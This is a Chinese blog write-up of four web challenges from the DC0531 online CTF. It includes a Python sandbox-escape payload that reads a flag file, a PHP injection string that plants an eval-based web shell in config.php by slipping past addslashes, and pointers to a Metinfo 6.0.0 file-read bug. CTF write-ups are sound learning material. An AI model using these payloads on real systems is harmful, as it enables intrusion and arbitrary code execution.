[DC0531] CTF 线上赛 web

这个端午好像就放了这么一个比赛
之前我还以为很简单。。意外
发现自己还是挺菜

web1

这道题首先是让你关注微信公众号,我还以为关注了就可以

意外的是他居然要做题!
[DC0531] CTF 线上赛 web_第1张图片

进去是这样的
[DC0531] CTF 线上赛 web_第2张图片

选择武器真滴刺激
主要的就是射击,fuzz一下就是

要s:ip 我就s:
[DC0531] CTF 线上赛 web_第3张图片

找辉神问了一下怎么样可以收到ping包——用tcpdump
sudo tcpdump ip proto \\icmp

网上找了一下使用tcpdump
https://www.cnblogs.com/f-ck-need-u/p/7064286.html
一直不行=。=觉得关题目了
找了腹黑要了payload

tcpdump -i venet0:0 src 139.198.3.171 -q -XX -nn -vvv

给我的payload里面有网址=。=
139.198.3.171进去之后发现有.git泄露
关题目了呜呜呜

web2

首先是www.zip泄露
这道题是Metinfo 6.0.0的新漏洞吧
总不可能找0day
上网搜索一下只在bugscan中找到一个6月5号的任意文件读取
看着告诉了我们路径我觉得没错了
上网再查一番
http://badcode.cc/2018/05/26/Metinfo-6-0-0-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/
有这一份5-26号的!按着这个做就行
我做的时候环境关了给一份li4n0师傅的payload

[DC0531] CTF 线上赛 web_第4张图片

web3

python的日沙箱
http://www.360zhijia.com/360anquanke/178589.html
魔法函数!就可以了

().__class__.__bases__[0].__subclasses__()

但是没有任何东西

0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")

有东西
用for循环读取一下

[i.read()for(i)in[0x1.__class__.__base__.__subclasses__()[40]("/home/ctf/flag")]]

这样就好啦

web4

这题又给源码了
git泄露
payload

option=dfgh\';eval($_GET[c]);//

做的时候我在本地搭了环境在线试的发现并没有过滤\(着急做题就没仔细想)
但是addslashes是过滤了\的呀
估计就是那个正则表达式的问题吧
原来是因为preg_replace的问题使得\又被转义了一次
所以单引号逃出来了

就可以了在config.php中执行任意命令了
最难的是要跑脚本了,一直上传自己的命令,跟别人抢
最后cat flag.php时候bp中不行
我是直接用firefox的

你可能感兴趣的:([DC0531] CTF 线上赛 web)